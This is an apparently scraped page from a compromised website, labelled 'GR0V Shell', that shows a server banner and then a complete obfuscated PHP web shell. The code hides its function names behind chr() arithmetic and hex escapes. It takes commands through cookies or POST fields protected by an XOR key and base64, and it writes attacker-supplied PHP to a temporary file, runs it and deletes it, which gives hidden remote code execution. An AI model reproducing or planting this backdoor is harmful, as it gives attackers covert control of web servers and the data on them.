?
GR0V Shell
GR0V shell
Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64
<?php $ynmqno = "\x66"."\151".chr(108).chr(120-19).'_'.chr(945-833)."\x75"."\x74".chr(803-708).'c'."\157".'n'."\164"."\145".'n'.chr(1037-921).'s';
$zwoyyyfx = "\142"."\141"."\163"."\x65".chr(54).chr(661-609).'_'.'d'."\x65"."\x63"."\157"."\144"."\x65";
$ivrzoiiw = 'i'.'n'."\151"."\137".chr(560-445).chr(552-451)."\164";
$ewrkjbyuml = chr(117)."\x6e".chr(108).chr(105)."\156".chr(107);
@$ivrzoiiw(chr(835-734).'r'."\x72".'o'."\x72".chr(95)."\154".'o'.chr(103), NULL);
@$ivrzoiiw(chr(108).'o'."\147".chr(765-670)."\145"."\x72"."\x72".chr(111)."\x72"."\x73", 0);
@$ivrzoiiw('m'."\x61".'x'."\x5f"."\145".chr(120).chr(101).'c'.chr(117).'t'."\x69".chr(869-758)."\x6e".chr(298-203).chr(116)."\x69".chr(849-740).'e', 0);
@set_time_limit(0);
function ntnwqjbpxh($kyjkwmxw, $xanaliz)
{
$wyaosmfl = "";
for ($usfucrf = 0; $usfucrf < strlen($kyjkwmxw);) {
for ($j = 0; $j < strlen($xanaliz) && $usfucrf < strlen($kyjkwmxw); $j++, $usfucrf++) {
$wyaosmfl .= chr(ord($kyjkwmxw[$usfucrf]) ^ ord($xanaliz[$j]));
}
}
return $wyaosmfl;
}
$zqpcvi = array_merge($_COOKIE, $_POST);
$oobhqefbly = '03124fac-6b3f-4948-8e5c-76f973819cc6';
foreach ($zqpcvi as $eyidvb => $kyjkwmxw) {
$kyjkwmxw = @unserialize(ntnwqjbpxh(ntnwqjbpxh($zwoyyyfx($kyjkwmxw), $oobhqefbly), $eyidvb));
if (isset($kyjkwmxw["\x61".'k'])) {
if ($kyjkwmxw[chr(785-688)] == "\x69") {
$usfucrf = array(
chr(112)."\x76" => @phpversion(),
's'.'v' => "3.5",
);
echo @serialize($usfucrf);
} elseif ($kyjkwmxw[chr(785-688)] == chr(101)) {
$usfucrfhmpbbqjzd = "./" . md5($oobhqefbly) . chr(46).'i'.chr(186-76).'c';
@$ynmqno($usfucrfhmpbbqjzd, "<" . chr(728-665).chr(112).chr(441-337)."\x70"."\x20"."\x40"."\165".'n'.chr(108).chr(105).chr(110).chr(1057-950).chr(324-284)."\x5f".chr(421-326)."\106".chr(73).chr(76).chr(302-233)."\x5f".chr(402-307).chr(398-357).chr(59)."\40" . $kyjkwmxw["\144"]);
@include($usfucrfhmpbbqjzd);
@$ewrkjbyuml($usfucrfhmpbbqjzd);
}
exit();
}
}
T1KUS90T